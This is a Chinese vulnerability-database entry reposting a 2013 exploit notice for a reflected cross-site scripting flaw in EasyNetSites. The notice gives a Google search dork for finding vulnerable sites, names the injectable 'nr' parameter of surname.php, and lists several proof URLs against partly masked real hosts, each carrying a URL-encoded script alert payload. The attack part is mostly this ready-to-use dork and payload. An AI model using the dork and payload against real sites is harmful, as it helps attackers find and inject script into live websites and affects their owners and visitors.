EasyNetSites Cross site scripting vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044540 漏洞类型
发布时间 2013-08-23 更新时间 2013-08-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080190
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#****************************************************************************
# Exploit Title : EasyNetSites Cross site scripting vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Date: 2013/08/21
# Vendor Page: http://www.easynetsites.com/
#****************************************************************************
# Tested on: Windows,Linux
#****************************************************************************
#
#///////////////////////////////////////////////
# Google Dork : intext:"Design by Webworx Design Group using EasyNetSites.com Webware"
#///////////////////////////////////////////////
# Location : /surname.php/?nr=[xss]
#
# Proof:
#
# http://wwXXrg/surname.php/?nr=%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://wwXXXrg/surname.php/?nr=%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://wwwXXg/surname.php/?nr=%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://wwXXrg/surname.php/?nr=%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://wXXXrg/surname.php/?nr=%3Cscript%3Ealert%281%29;%3C/script%3E
#
#########################
discovered by : ACC3SS
#########################